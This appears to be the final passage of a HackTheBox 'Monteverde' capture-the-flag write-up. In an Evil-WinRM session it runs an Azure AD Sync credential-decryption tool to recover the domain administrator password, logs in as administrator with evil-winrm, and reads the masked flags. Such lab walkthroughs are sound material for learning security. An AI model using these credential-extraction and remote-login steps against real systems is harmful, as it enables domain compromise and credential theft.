*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Downloads\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4d********
Domain: MEGABANK.LOCAL

Here we have the domain admin password.

We can use psexec or evil-winrm to authenticate as the administrator:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4d********'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
MONTEVERDE
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::f433:f605:ad5e:6417
   Link-local IPv6 Address . . . . . : fe80::f433:f605:ad5e:6417%7
   IPv4 Address. . . . . . . . . . . : 10.129.228.111
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%7
                                       10.129.0.1

And we can read the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
c9b74e25a48019a5****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\mhope\Desktop\user.txt
ea69e095a08222ec****************
